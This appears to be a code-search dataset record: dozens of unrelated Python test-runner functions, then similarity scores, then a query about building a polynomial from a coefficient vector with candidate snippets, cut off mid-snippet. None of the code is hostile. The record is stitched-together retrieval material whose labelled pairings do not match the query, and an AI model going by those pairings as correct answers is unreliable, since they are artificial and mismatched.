self._netconf_test_objects.append(obj)\n\n for cls in PBREQ_TESTS:\n obj = cls(self._dts, self.log, self._nc_proxy, self._loop)\n yield from obj.dts_self_register()\n self._pbreq_test_objects.append(obj)\n\n @asyncio.coroutine\n def run_all_tests(xact_info, action, ks_path, msg):\n ro1 = yield from self.run_tests(self._netconf_test_objects, msg.continue_on_failure)\n if ro1.failed_count is 0 or msg.continue_on_failure is True:\n ro2 = yield from self.run_tests(self._pbreq_test_objects, msg.continue_on_failure)\n\n ro = RwAgentTestbedYang.AgentTestsOp()\n ro.total_tests = ro1.total_tests + ro2.total_tests\n ro.passed_count = ro1.passed_count + ro2.passed_count\n ro.failed_count = ro1.failed_count + ro2.failed_count\n #ro.failed_tests = ro1.failed_tests + ro2.failed_tests\n\n xpath = \"O,/agt-tb:agent-tests\"\n xact_info.respond_xpath(rwdts.XactRspCode.ACK, xpath, ro)\n\n @asyncio.coroutine\n def run_all_netconf_tests(xact_info, action, ks_path, msg):\n ro = yield from self.run_tests(self._netconf_test_objects)\n xpath = \"O,/agt-tb:agent-tests\"\n xact_info.respond_xpath(rwdts.XactRspCode.ACK, xpath, ro)\n\n @asyncio.coroutine\n def run_all_pbreqs_tests(xact_info, action, ks_path, msg):\n ro = yield from self.run_tests(self._pbreq_test_objects)\n xpath = \"O,/agt-tb:agent-tests\"\n xact_info.respond_xpath(rwdts.XactRspCode.ACK, xpath, ro)\n \n # Register for all test-cases\n yield from self._dts.register(\n xpath=\"I,/agt-tb:agent-tests/agt-tb:all\",\n flags=rwdts.Flag.PUBLISHER,\n handler=rift.tasklets.DTS.RegistrationHandler(on_prepare=run_all_tests))\n\n # Register for per category all test-cases\n yield from self._dts.register(\n xpath=\"I,/agt-tb:agent-tests/agt-tb:netconf-tests/agt-tb:all\",\n flags=rwdts.Flag.PUBLISHER,\n handler=rift.tasklets.DTS.RegistrationHandler(on_prepare=run_all_netconf_tests))\n\n yield from self._dts.register(\n xpath=\"I,/agt-tb:agent-tests/agt-tb:pb-request-tests/agt-tb:all\",\n flags=rwdts.Flag.PUBLISHER,\n handler=rift.tasklets.DTS.RegistrationHandler(on_prepare=run_all_pbreqs_tests))", "def test_network(self, weights, env, episodes, seed, network=None, timeout=None):\n return self.run(\n backend_test_network, weights, #model creation params\n self.network_generator, env, episodes, seed, #test network params\n timeout=timeout\n )", "def run(self) -> None:\n self.test_sanity()\n if self.has_errors():\n return\n\n tests: List[Callable[[], None]] = [\n self.test_headlines_predefined,\n self.test_headlines_required,\n self.test_headlines_dependencies,\n self.test_headlines_order,\n self.test_headlines_named_entities,\n self.test_named_entities,\n self.test_reading_attributes,\n self.test_forbidden_words,\n self.test_unwanted_words,\n self.test_police_abbreviations,\n self.test_spelling,\n self.test_grammar_rules_regex,\n ]\n\n for test in tests:\n if self.stop_on_error and self.has_errors():\n break\n test()", "def test_01(self):\n if _debug: TestIAmRouterToNetwork._debug(\"test_01\")\n\n # create a network\n tnet = TNetwork()\n\n # test device sends request\n tnet.iut.start_state.doc(\"1-1-0\") \\\n .call(tnet.iut.nse.i_am_router_to_network).doc(\"1-1-1\") \\\n .success()\n\n # network 1 sees router to networks 2 and 3\n tnet.sniffer1.start_state.doc(\"1-2-0\") \\\n .receive(IAmRouterToNetwork,\n iartnNetworkList=[2, 3],\n ).doc(\"1-2-1\") \\\n .success()\n\n # network 2 sees router to networks 1 and 3\n tnet.sniffer2.start_state.doc(\"1-3-0\") \\\n .receive(IAmRouterToNetwork,\n iartnNetworkList=[1, 3],\n ).doc(\"1-3-1\") \\\n .success()\n\n # network 3 sees router to networks 1 and 2\n tnet.sniffer3.start_state.doc(\"1-4-0\") \\\n .receive(IAmRouterToNetwork,\n iartnNetworkList=[1, 2],\n ).doc(\"1-4-1\") \\\n .success()\n\n # run the group\n tnet.run()", "def _run_ci_test():\n _run_install(False)\n _run_coverage_html(False)\n _run_typecheck_xml(False)\n _run_lint(True)", "def runTest(self):\n\t\tself.setUp()\n\t\tself.test_postopProgramming1()", "def runTest(self):\n self.setUp()\n self.test_BiplaneRegistration1()", "def test_get_network(self):\n pass", "def main():\n # add all new test suites per test module here\n suite_date = test_date.suite()\n suite_ng = test_ng.suite()\n suite_page = test_page.suite()\n suite_container = test_container.suite()\n\n # add the suite to be tested here\n alltests = unittest.TestSuite((suite_date,\n suite_ng,\n suite_page,\n suite_container))\n\n # run the suite\n runner = unittest.TextTestRunner()\n runner.run(alltests)", "def _run_local_tests(self, *args, **kwargs):\n pass", "def test(self):\n for arch, python in self.python:\n self.run(f\"{python} -m pytest\")", "def run_tests(tests):\n return [test(t) for t in tests]", "def run_all_tests():\n successes = 0\n testsrun = 0\n testsdir = tests_dirpath()\n for test in os.listdir(testsdir):\n path = os.path.join(testsdir, test)\n if os.path.isdir(path):\n testsrun += 1\n if run_test(path):\n successes += 1\n print(\"--- %d/%d TESTS PASSED ---\" % (successes, testsrun))\n return successes == testsrun", "def test_on_all(self) -> None:\n x_test, y_test = self.mnist.test.images, self.mnist.test.labels\n N = self.mnist.test.num_examples\n\n # I have replaced all -1 with self.mb_size to be sure about exact shapes of all layers.\n assert N % self.mb_size == 0,\\\n \"Sorry, mb_size must divide the number of images in test set\"\n\n results = np.array([0., 0.])\n for batch_no in range(N // self.mb_size):\n beg = batch_no * self.mb_size\n end = min(N, (batch_no + 1) * self.mb_size)\n len_batch = end - beg\n batch_results = np.array(self.test_on_batch(x_test[beg:end], y_test[beg:end]))\n results += batch_results * len_batch\n results /= N\n self.logger.info(\"(Test(final): Loss: {0[0]}, accuracy: {0[1]}\".format(results))", "def test():\n import unittest\n testmodules = [\n 'bettermathlib_tests',\n 'randomwebapp_tests',\n ]\n suite = unittest.TestSuite()\n for t in testmodules:\n suite.addTest(unittest.defaultTestLoader.loadTestsFromName(t))\n unittest.TextTestRunner(verbosity=2).run(suite)", "def run_training_save_tests():\n test_training_save()\n test_distributed_training_save()\n test_multimodel_training_save()\n test_distributed_multimodel_training_save()", "def exe_tests(self):\n self.rank = mpicom.rank()\n self.size = mpicom.size()\n if mpicom.parallel():\n self.test(\"libname\",os.path.split(mpicom.__file__)[1],\"mpicom.so\")\n else:\n self.test(\"libname\",os.path.split(mpicom.__file__)[1],\"mpistub.pyc\")\n self.test_broadcast()\n self.test_reduce()\n self.test_p2p()\n self.test_gather()\n self.test_scatter()\n #self.test_alltoall()", "def test(all=False):\n\n # Do the import internally, so that this function doesn't increase total\n # import time\n from iptest import run_iptestall\n run_iptestall(inc_slow=all)", "def run(self, args):\n start_time = time.time()\n self._printer.write_update('Collecting tests ...')\n running_all_tests = False\n\n try:\n paths, all_test_names, running_all_tests = self._collect_tests(\n args)\n except IOError:\n # This is raised if --test-list doesn't exist\n return test_run_results.RunDetails(\n exit_code=exit_codes.NO_TESTS_EXIT_STATUS)\n\n test_names = self._finder.split_into_chunks(all_test_names)\n if self._options.order == 'natural':\n test_names.sort(key=self._port.test_key)\n elif self._options.order == 'random':\n test_names.sort()\n random.Random(self._options.seed).shuffle(test_names)\n elif self._options.order == 'none':\n # Restore the test order to user specified order.\n # base.tests() may change the order as it returns tests in the\n # real, external/wpt, virtual order.\n if paths:\n test_names = self._restore_order(paths, test_names)\n\n if not self._options.no_expectations:\n self._printer.write_update('Parsing expectations ...')\n self._expectations = test_expectations.TestExpectations(self._port)\n\n tests_to_run, tests_to_skip = self._prepare_lists(paths, test_names)\n\n self._printer.print_found(\n len(all_test_names), len(test_names), len(tests_to_run),\n self._options.repeat_each, self._options.iterations)\n\n # Check to make sure we're not skipping every test.\n if not tests_to_run:\n msg = 'No tests to run.'\n if self._options.zero_tests_executed_ok:\n _log.info(msg)\n # Keep executing to produce valid (but empty) results.\n else:\n _log.critical(msg)\n code = exit_codes.NO_TESTS_EXIT_STATUS\n return test_run_results.RunDetails(exit_code=code)\n\n exit_code = self._set_up_run(tests_to_run)\n if exit_code:\n return test_run_results.RunDetails(exit_code=exit_code)\n\n if self._options.num_retries is None:\n # If --test-list is passed, or if no test narrowing is specified,\n # default to 3 retries. Otherwise [e.g. if tests are being passed by\n # name], default to 0 retries.\n if self._options.test_list or len(paths) < len(test_names):\n self._options.num_retries = 3\n else:\n self._options.num_retries = 0\n\n should_retry_failures = self._options.num_retries > 0\n\n try:\n self._register_termination_handler()\n self._start_servers(tests_to_run)\n if self._options.watch:\n run_results = self._run_test_loop(tests_to_run, tests_to_skip)\n else:\n run_results = self._run_test_once(tests_to_run, tests_to_skip,\n should_retry_failures)\n initial_results, all_retry_results = run_results\n finally:\n _log.info(\"Finally stop servers and clean up\")\n self._stop_servers()\n self._clean_up_run()\n\n if self._options.no_expectations:\n return test_run_results.RunDetails(0, [], [], initial_results,\n all_retry_results)\n\n # Some crash logs can take a long time to be written out so look\n # for new logs after the test run finishes.\n self._printer.write_update('Looking for new crash logs ...')\n self._look_for_new_crash_logs(initial_results, start_time)\n for retry_attempt_results in all_retry_results:\n self._look_for_new_crash_logs(retry_attempt_results, start_time)\n\n self._printer.write_update('Summarizing results ...')\n summarized_full_results = test_run_results.summarize_results(\n self._port, self._options, self._expectations, initial_results,\n all_retry_results)\n summarized_failing_results = test_run_results.summarize_results(\n self._port,\n self._options,\n self._expectations,\n initial_results,\n all_retry_results,\n only_include_failing=True)\n run_histories = test_run_results.test_run_histories(\n self._options, self._expectations, initial_results,\n all_retry_results)\n\n exit_code = summarized_failing_results['num_regressions']\n if exit_code > exit_codes.MAX_FAILURES_EXIT_STATUS:\n _log.warning('num regressions (%d) exceeds max exit status (%d)',\n exit_code, exit_codes.MAX_FAILURES_EXIT_STATUS)\n exit_code = exit_codes.MAX_FAILURES_EXIT_STATUS\n\n if not self._options.dry_run:\n self._write_json_files(summarized_full_results,\n summarized_failing_results, initial_results,\n running_all_tests, run_histories)\n\n self._copy_results_html_file(self._artifacts_directory,\n 'results.html')\n if (initial_results.interrupt_reason is\n test_run_results.InterruptReason.EXTERNAL_SIGNAL):\n exit_code = exit_codes.INTERRUPTED_EXIT_STATUS\n else:\n if initial_results.interrupted:\n exit_code = exit_codes.EARLY_EXIT_STATUS\n if (self._options.show_results\n and (exit_code or initial_results.total_failures)):\n self._port.show_results_html_file(\n self._filesystem.join(self._artifacts_directory,\n 'results.html'))\n self._printer.print_results(time.time() - start_time,\n initial_results)\n\n return test_run_results.RunDetails(exit_code, summarized_full_results,\n summarized_failing_results,\n initial_results, all_retry_results)", "def make_all():\n\n if not MASTER.exists():\n os.makedirs(MASTER)\n members = inspect.getmembers(sys.modules[__name__])\n members = [f for f in members if 'test_' in f[0]]\n for member in members:\n print('Running %s...' % member[0], end='')\n member[1](master=True)\n print('done!')", "def make_all():\n\n if not MASTER.exists():\n os.makedirs(MASTER)\n members = inspect.getmembers(sys.modules[__name__])\n members = [f for f in members if 'test_' in f[0]]\n for member in members:\n print('Running %s...' % member[0], end='')\n member[1](master=True)\n print('done!')", "def runTest(self):\n unittest.main()\n ChoreTest.clean_up()", "def main():\n dims = params['dims']\n\n for d in dims:\n print('**** Running test for d={0:d} ****'.format(d))\n run_test(d)", "def _run_tests(self):\n for pyunit_testcase in self.cfg.testcases:\n yield self._run_testsuite(pyunit_testcase)", "def test():\n import unittest\n\n tests = unittest.TestLoader().discover(\"tests\")\n unittest.TextTestRunner(verbosity=2).run(tests)", "def main():\n return run_network_interface_check()", "def unittest():\n from a6test import test_all\n test_all()", "def test_register_network(self):\n pass", "def test():\n import unittest\n tests = unittest.TestLoader().discover(tests)\n unittest.TextTestRunner(verbosity=2).run(tests)", "def RunAll():\n testfunctions = []\n for name, obj in inspect.getmembers(sys.modules[__name__]):\n if inspect.isfunction(obj) and name != 'RunAll':\n testfunctions.append(obj)\n\n # run all the functions\n for f in testfunctions:\n print('Running %s' % str(f))\n f()", "def run_feature_extraction_tests():\n test_feature_extraction()\n test_distributed_feature_extraction()\n test_multimodel_feature_extraction()\n test_distributed_multimodel_feature_extraction()", "def run_tests(remit, sourcelist):\n for source in sourcelist:\n # - move into source's directory\n os.chdir(source)\n # - build worklist of commands\n commands = list()\n commands += test_matrix(remit, source)\n commands += extra_tests(remit, source)\n commands = remove_blacklist(remit, source, commands)\n # - run the commands\n for i, command in enumerate(commands):\n print('[test %s: %s of %d] %s'\n % (source,\n str(i+1).rjust(len(str(len(commands)))),\n len(commands),\n ' '.join(command)))\n subprocess.call(command)\n # - move out of source's directory\n os.chdir('..')", "def test():\n import unittest\n tests = unittest.TestLoader().discover('tests')\n unittest.TextTestRunner(verbosity=2).run(tests)", "def test_network(self):\n train_accuracy = 100 - percentError(map(self.neural_result,\n self.train_inputs),\n self.train_outputs)\n print 'Train accuracy:', train_accuracy\n\n test_accuracy = 100 - percentError(map(self.neural_result,\n self.test_inputs),\n self.test_outputs)\n print 'Test accuracy:', test_accuracy\n\n print '#' * int(train_accuracy), 'TR'\n print '#' * int(test_accuracy), 'TE'", "def execute(self):\n for test in self.tests:\n test.execute()\n self.logger.dump()\n print(\"Finished!\")", "def run_tests(self):\n # Trigger a config change which triggers a deferred hook.\n self.run_charm_change_hook_test('configure_ovs')\n\n # Trigger a package change which requires a restart\n self.run_package_change_test(\n 'openvswitch-switch',\n 'openvswitch-switch')", "def run_tests(self):\n # Trigger a config change which triggers a deferred hook.\n self.run_charm_change_hook_test('configure_ovs')\n\n # Trigger a package change which requires a restart\n self.run_package_change_test(\n 'openvswitch-switch',\n 'openvswitch-switch')", "def test_network(bpn, test_data):\n DisplayNetwork.display_green(\"[INFO] Started to test the network\")\n output = bpn.Run(np.array(test_data))\n return output", "def run_tests(self):\n # Charm does not defer hooks so that test is not included.\n # Trigger a package change which requires a restart\n self.run_package_change_test(\n 'ovn-central',\n 'ovn-central')", "def runWithDirector(global_options, create_input_store=True):\n from ooni.director import Director\n start_tor = False\n director = Director()\n if global_options['list']:\n net_tests = [net_test for net_test in director.getNetTests().items()]\n log.msg(\"\")\n log.msg(\"Installed nettests\")\n log.msg(\"==================\")\n for net_test_id, net_test in net_tests:\n optList = []\n for name, details in net_test['arguments'].items():\n optList.append({'long': name, 'doc': details['description']})\n\n desc = ('\\n' +\n net_test['name'] +\n '\\n' +\n '-'*len(net_test['name']) +\n '\\n' +\n '\\n'.join(textwrap.wrap(net_test['description'], 80)) +\n '\\n\\n' +\n '$ ooniprobe {}/{}'.format(net_test['category'],\n net_test['id']) +\n '\\n\\n' +\n ''.join(usage.docMakeChunks(optList))\n )\n map(log.msg, desc.split(\"\\n\"))\n log.msg(\"Note: Third party tests require an external \"\n \"application to run properly.\")\n\n raise SystemExit(0)\n\n if global_options.get('annotations') is not None:\n global_options['annotations'] = setupAnnotations(global_options)\n\n if global_options.get('preferred-backend') is not None:\n config.advanced.preferred_backend = global_options['preferred-backend']\n\n if global_options['no-collector']:\n log.msg(\"Not reporting using a collector\")\n global_options['collector'] = None\n start_tor = False\n elif config.advanced.get(\"preferred_backend\", \"onion\") == \"onion\":\n start_tor = True\n\n if (global_options['collector'] and\n config.advanced.get(\"preferred_backend\", \"onion\") == \"onion\"):\n start_tor |= True\n\n return runTestWithDirector(\n director=director,\n start_tor=start_tor,\n global_options=global_options,\n create_input_store=create_input_store\n )", "def test():\n tests = unittest.TestLoader().discover('tests')\n unittest.TextTestRunner(verbosity=2).run(tests)", "def test():\n tests = unittest.TestLoader().discover('tests')\n unittest.TextTestRunner(verbosity=2).run(tests)", "def test():\n tests = unittest.TestLoader().discover('tests')\n unittest.TextTestRunner(verbosity=2).run(tests)", "def test_03(self):\n if _debug: TestIAmRouterToNetwork._debug(\"test_03\")\n\n # create a network\n tnet = TNetwork()\n\n # test device sends request\n tnet.iut.start_state.doc(\"3-1-0\") \\\n .call(tnet.iut.nse.i_am_router_to_network,\n destination=Address(\"1:*\"),\n ).doc(\"3-1-1\") \\\n .success()\n\n # network 1 sees router to networks 2 and 3\n tnet.sniffer1.start_state.doc(\"3-2-0\") \\\n .receive(IAmRouterToNetwork,\n iartnNetworkList=[2, 3],\n ).doc(\"3-2-1\") \\\n .success()\n\n # network 2 sees nothing\n tnet.sniffer2.start_state.doc(\"3-3-0\") \\\n .timeout(10).doc(\"3-3-1\") \\\n .success()\n\n # network 3 sees nothing\n tnet.sniffer3.start_state.doc(\"3-4-0\") \\\n .timeout(10).doc(\"3-4-1\") \\\n .success()\n\n # run the group\n tnet.run()", "def actionRunUnitTests():\n UnitTestRunner.init()\n \n for target in Settings.targets:\n for platform in Settings.targetPlatforms:\n for cpu in Settings.targetCPUs:\n for configuration in Settings.targetConfigurations:\n if not Summary.checkIfActionFailed(ACTION_BUILD, target, platform, cpu, configuration):\n Logger.printStartActionMessage('Running unit tests for ' + target + ' ' + platform + ' ' + cpu + ' ' + configuration, ColoredFormatter.YELLOW)\n result = UnitTestRunner.run(target, platform, cpu, configuration)\n Summary.addSummary(ACTION_RUN_UNITTESTS, target, platform, cpu, configuration, result, UnitTestRunner.executionTime)\n if result != NO_ERROR:\n Logger.printEndActionMessage('Failed to execute unit tests!')\n else:\n Logger.printEndActionMessage('Executed all unit tests')", "def CASE3( self, main ):\n\n from tests.USECASE.SegmentRouting.SRRouting.dependencies.SRRoutingTest import SRRoutingTest\n\n SRRoutingTest.runTest( main,\n test_idx=3,\n onosNodes=3,\n dhcp=1,\n routers=1,\n ipv4=1,\n ipv6=1,\n countFlowsGroups=False,\n linkFailure=False,\n description=\"Ping between all ipv4 and ipv6 hosts in the topology\" )", "def run_tests(self):\n manifest = manifestparser.TestManifest(\n manifests=[os.path.join(self.repository_path, self.manifest_path)],\n strict=False)\n\n tests = manifest.active_tests(**mozinfo.info)\n self._mozmill.run(tests, self.options.restart)\n\n # Whenever a test fails it has to be marked, so we quit with the correct exit code\n self.last_failed_tests = self.last_failed_tests or self._mozmill.results.fails\n\n self.testrun_index += 1", "def test_and_multi_epoch(self):\n\n for epochs in range(10, 100, 10):\n perceptron, network, perceptron_estimated_values, \\\n network_estimated_values, perceptron_unit_error, network_unit_error \\\n = TestPerceptronNetwork.and_setup(epochs)\n\n self.assert_same_results(perceptron, network, perceptron_estimated_values,\n network_estimated_values, perceptron_unit_error,\n network_unit_error)", "def test():\n\n tests = unittest.TestLoader().discover('api/tests/', pattern='*/test_*.py')\n unittest.TextTestRunner(verbosity=2).run(tests)", "def runTest(self):\n self.setUp()\n self.test_FiberDistance1()", "def runTests():\r\n\r\n print(\"running a few tests\")\r\n\r\n average = compute .gpsAverage (4, 5)\r\n print(\"average = \", average)\r\n \r\n print (\"hello!\")", "def run_tests(output_dir, fstype):\n global options\n if options.debug:\n print \"Run NUMA test\"\n for num_disks in [2]:\n for num_dirs in range(1, 5):\n postmark = PostMarkTest(output_dir, fstype, num_disks, num_dirs)\n run_one_test(postmark)", "def runTest(self):\n self.setUp()\n self.test_STLModelBuilder1()", "def run_all_tests():\n model_configs = (model_handler.ModelConfig(\n saved_model_dir=platform_test.test_src_dir_path(\n \"python/compiler/tensorrt/model_tests/sample_model\"),\n default_batch_size=128),)\n if FLAGS.use_tf2:\n model_handler_cls = model_handler.ModelHandlerV2\n trt_model_handeler_cls = model_handler.TrtModelHandlerV2\n default_trt_convert_params = DEFAUL_TRT_CONVERT_PARAMS._replace(\n is_dynamic_op=True)\n else:\n model_handler_cls = model_handler.ModelHandlerV1\n trt_model_handeler_cls = model_handler.TrtModelHandlerV1\n default_trt_convert_params = DEFAUL_TRT_CONVERT_PARAMS._replace(\n is_dynamic_op=False)\n for model_config in model_configs:\n trt_convert_params = default_trt_convert_params._replace(\n max_batch_size=model_config.default_batch_size)\n base_model = model_handler_cls(model_config)\n random_inputs = base_model.generate_random_inputs()\n base_model_result = base_model.run(random_inputs)\n trt_fp32_model_result = trt_model_handeler_cls(\n model_config=model_config,\n trt_convert_params=trt_convert_params._replace(\n precision_mode=trt.TrtPrecisionMode.FP32)).run(random_inputs)\n trt_fp16_model_result = trt_model_handeler_cls(\n model_config=model_config,\n trt_convert_params=trt_convert_params._replace(\n precision_mode=trt.TrtPrecisionMode.FP16)).run(random_inputs)\n\n logging.info(\"Base model latency: %f ms\",\n _get_mean_latency(base_model_result))\n logging.info(\"TensorRT FP32 model latency: %f ms\",\n _get_mean_latency(trt_fp32_model_result))\n logging.info(\"TensorRT FP16 model latency: %f ms\",\n _get_mean_latency(trt_fp16_model_result))", "def main_test():\n full = unittest.TestSuite()\n full.addTest(unittest.makeSuite(TestToolOptions))\n full.addTest(unittest.makeSuite(TestBadConfiguration))\n full.addTest(unittest.makeSuite(TestBasicEndpoints))\n full.addTest(unittest.makeSuite(TestMultipleEPG))\n full.addTest(unittest.makeSuite(TestBasicExistingEndpoints))\n full.addTest(unittest.makeSuite(TestBasicExistingEndpointsAddPolicyLater))\n full.addTest(unittest.makeSuite(TestExportPolicyRemoval))\n full.addTest(unittest.makeSuite(TestBasicEndpointsWithContract))\n full.addTest(unittest.makeSuite(TestBasicEndpointMove))\n full.addTest(unittest.makeSuite(TestPolicyChangeProvidedContract))\n full.addTest(unittest.makeSuite(TestChangeL3Out))\n full.addTest(unittest.makeSuite(TestDuplicates))\n full.addTest(unittest.makeSuite(TestDuplicatesTwoL3Outs))\n full.addTest(unittest.makeSuite(TestDeletions))\n\n unittest.main()", "def run_tests():\n fail = []\n okay = []\n for i in os.listdir(\".\"):\n if i.find(\"_test_\") > -1 and i.endswith(\".py\"):\n if 0 != subprocess.call(\"python \" + i, shell=True):\n fail.append(i)\n else:\n okay.append(i)\n if fail:\n print(\"[ERROR] The following %u tests failed: %r\" % (len(fail), fail))\n return False\n print(\"[DONE] All %u tests completely successfully!\" % (len(okay)))\n return True", "def testAutomodeNetwork(self):\n ### create test resources\n instance_name = \"end-to-end-test-instance-1\"\n instance_selfLink = \\\n self.test_resource_creator.create_instance_using_template(\n instance_name,\n self.test_resource_creator.legacy_instance_template_selfLink)[\n 'targetLink']\n original_config = self.google_api_interface.get_instance_configs(\n instance_name)\n auto_subnetwork_name = 'end-to-end-test-auto-subnetwork'\n try:\n network_selfLink = self.google_api_interface.get_network(auto_subnetwork_name)['selfLink']\n except:\n network_selfLink = self.google_api_interface.create_auto_subnetwork(auto_subnetwork_name)['targetLink']\n\n ### start migration\n selfLink_executor = SelfLinkExecutor(self.compute, instance_selfLink,\n auto_subnetwork_name,\n None,\n True)\n\n migration_handler = selfLink_executor.build_migration_handler()\n migration_handler.network_migration()\n\n ### check result\n new_config = self.google_api_interface.get_instance_configs(\n instance_name)\n self.assertTrue(\n resource_config_is_unchanged_except_for_network(new_config,\n original_config))\n self.assertTrue(\n compare_instance_external_ip(new_config, original_config))\n # network changed\n self.assertTrue(check_instance_network(new_config,\n network_selfLink,\n ))\n print('Pass the current test')", "def setUp(self):\n sumo_bin = sumolib.checkBinary('sumo')\n traci.start([sumo_bin, \"-n\", self.network_path, \"-r\", self.routes_path])\n traci.simulationStep()" ]
[ "0.7459378", "0.74455136", "0.7278033", "0.71453613", "0.713573", "0.7003208", "0.69377714", "0.6935737", "0.6916369", "0.68943274", "0.6879508", "0.6857769", "0.67931044", "0.6778059", "0.6765904", "0.675124", "0.67291695", "0.66894144", "0.66677123", "0.6644143", "0.66383016", "0.66262877", "0.6606613", "0.65838885", "0.65819764", "0.6575092", "0.6560523", "0.65121496", "0.6498272", "0.6486818", "0.6473093", "0.64716804", "0.6462493", "0.6453718", "0.6447231", "0.64346874", "0.6416155", "0.6393734", "0.63839215", "0.63750714", "0.63733876", "0.63679796", "0.6366267", "0.6364766", "0.6361186", "0.6359695", "0.63449484", "0.63288456", "0.6327869", "0.631808", "0.6306854", "0.62915", "0.629062", "0.62853813", "0.62805665", "0.6279111", "0.6272608", "0.6264477", "0.6261897", "0.6246347", "0.6242292", "0.6236423", "0.6236423", "0.62357223", "0.62352246", "0.62344855", "0.6231711", "0.62198985", "0.62170976", "0.62089044", "0.61940396", "0.618697", "0.6174979", "0.6164178", "0.6163468", "0.61597663", "0.6157005", "0.6155535", "0.6155535", "0.615398", "0.61510664", "0.61473453", "0.6140028", "0.6140028", "0.6140028", "0.6135964", "0.6131416", "0.61288404", "0.6128426", "0.6109904", "0.61080134", "0.6102849", "0.609976", "0.60980934", "0.6088969", "0.60838574", "0.6079074", "0.60788894", "0.607493", "0.60718" ]
0.627527
56
This function will get a vector an construct a polynomial(function) f(x) with each degree having a coefficient from the corrosponding value from the vector.
def vecToFunc(vector): def f(x): f = 0 for i in range(len(vector)): f += vector[i]*x**i return f return f
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def evaluate_polynomial(f,x):\n degree = len(f)-1\n ans = 0\n for i in f:\n ans += i*x**degree\n degree -= 1\n return(ans)", "def build_poly(x, degree):\n phi = np.ones(len(x))\n phi = np.vstack((phi, [x**(j+1) for j in range(degree)]))\n \n return phi.T", "def polynomial_creator(*coefficients):\n def polynomial(x):\n res = 0\n for index, coeff in enumerate(coefficients):\n res += coeff * x** index\n return res\n return polynomial", "def __getPolynomial(self) -> 'func':\n return lambda x: sum(self.pts[i]*base(x)\n for i, base in enumerate(self.basis))", "def get_poly_fun(fun: XFunction, x: float, degree: int) -> Poly:\n params = get_poly_params(fun, x, degree)\n return Poly(params)", "def poly_func(x):\n \n # Create the polynomial object\n f = np.poly1d([1, -2, -28, 28, 12, -26, 100])\n\n # Return the value of the polynomial\n return f(x) * 0.05", "def _poly_func(x, a, b, c, d, e):\n return a * x ** 6 + b * x ** 5 + c * x ** 4 + d * x ** 3 + e * x ** 2", "def build_poly(x, degree):\n tx = np.zeros((x.shape[0], x.shape[1]*(degree+1)))\n \n for j in range(degree+1):\n tx[:,x.shape[1]*j:x.shape[1]*(j+1)] = np.power(x,j)\n \n return tx", "def poly(x, degree=2):\n x = np.array(x)\n X_trans = np.transpose(np.vstack((x**k for k in range(degree + 1))))\n return np.linalg.qr(X_trans)[0][:, 1:]", "def build_poly(x, degree): \n # ***************************************************\n # COPY YOUR CODE FROM EX03 HERE\n # polynomial basis function: TODO\n # this function should return the matrix formed\n # by applying the polynomial basis to the input data\n # ***************************************************\n raise NotImplementedError", "def get_poly_params(fun: XFunction, x: float, degree: int) -> tuple[float, ...]:\n if degree < 0:\n return (0.0,)\n rhs = np.array([fun(x, order=i) for i in range(degree, -1, -1)])\n mat = np.zeros((degree + 1, degree + 1))\n for i in range(degree + 1):\n for j in range(i + 1):\n mat[i, j] = factorial(degree - j) / factorial(i - j) * x ** (i - j)\n return tuple(np.linalg.solve(mat, rhs))", "def zzX_eval(f, x):\n if hasattr(x, '__iter__'):\n return zzX_eval_list(f, x)\n\n if poly_univariate_p(f):\n return zzx_eval(f, x)\n\n if not x:\n return poly_TC(f)\n\n result = poly_LC(f)\n\n for coeff in f[1:]:\n result = zzX_mul_const(result, x)\n result = zzX_add(result, coeff)\n\n return result", "def zzX_to_poly(f, *symbols):\n from sympy.polys import Poly\n\n terms = {}\n\n for monom, coeff in zzX_to_dict(f).iteritems():\n terms[monom] = Integer(int(coeff))\n\n return Poly(terms, *symbols)", "def general_poly (L):\n def to_apply (x):\n n = 0\n for i in L:\n n = x*n + i\n return n\n return to_apply", "def coefficients_from_Weierstrass_polynomial(f):\n R = f.parent()\n cubic_variables = [x for x in R.gens() if f.degree(x) == 3]\n quadratic_variables = [y for y in R.gens() if f.degree(y) == 2]\n try:\n x = cubic_variables[0]\n y = quadratic_variables[0]\n except IndexError:\n raise ValueError('polynomial is not in long Weierstrass form')\n\n a1 = a2 = a3 = a4 = a6 = 0\n x3 = y2 = None\n for coeff, mon in f:\n if mon == x**3:\n x3 = coeff\n elif mon == x**2:\n a2 = coeff\n elif mon == x:\n a4 = coeff\n elif mon == 1:\n a6 = coeff\n elif mon == y**2:\n y2 = -coeff\n elif mon == x*y:\n a1 = -coeff\n elif mon == y:\n a3 = -coeff\n else:\n raise ValueError('polynomial is not in long Weierstrass form')\n\n if x3 != y2:\n raise ValueError('the coefficient of x^3 and -y^2 must be the same')\n elif x3 != 1:\n a1, a2, a3, a4, a6 = a1/x3, a2/x3, a3/x3, a4/x3, a6/x3\n return [a1, a2, a3, a4, a6]", "def build_poly(x, degree):\n \"\"\"\n Assemble the 3 label vectors with the original ordering \n Inputs:\n - x (ndarray) : binary prediction for set 1\n - degree (int) : binary prediction for set 2 \n Outputs: \n - p (ndarray) : predicted labels for test set ( with the original ordering)\n \"\"\"\n # forming a matrix containing the data points\n terms = np.hstack([np.ones([x.shape[0],1]),np.tile(x,(1,degree))])\n index = np.arange(degree)+1\n \n # forming a matrix contnaining the exponents\n exponents = np.multiply(np.ones((1, x.shape[1])), index[:, np.newaxis])\n exponents = exponents.reshape([1, x.shape[1]*degree])\n exponents = np.multiply(exponents, np.ones([x.shape[0], 1]))\n exponents = np.hstack([np.ones( (x.shape[0], 1) ),exponents])\n \n # using the exponent matrix as the element-wise exponents of the terms in the terms matrix\n p=np.power(terms,exponents)\n return p", "def polynomial(a, x):\n\n sum = 0\n\n for i in range(len(a)):\n sum += a[i] * x**i\n return sum", "def polynomial(degree, coeffs):\n\n def h(x):\n result = 0\n degre=degree\n for i in range(len(coeffs)):\n result = result + coeffs[i]*(x**degre)\n degre = degre - 1\n return result\n \n\n def h(x):\n result = 0\n nonlocal degree\n for i in range(len(coeffs)):\n result = result + coeffs[i]*(x**degree)\n degree = degree - 1\n return result\n\n\n\n\n\n return h\n\n # def h(x):\n # result = 0\n # for i in range(degree, -1, -1):\n # result = result + coeffs[degree - i]*(x**i)\n \n # return result\n \n\n\n # return h", "def poly(x, coeffs):\n return np.sum([coeffs[i] * x ** i for i in range(len(coeffs))], axis=0)", "def _evalPoly(self,a,x):\n y = a[0]\n for i in range(1,len(a)):\n y = self.F.Multiply(y, x)\n y = self.F.Add(y, a[i])\n return y", "def polyval_vec(p, x, prec=None):\n p = np.atleast_2d(p)\n x = 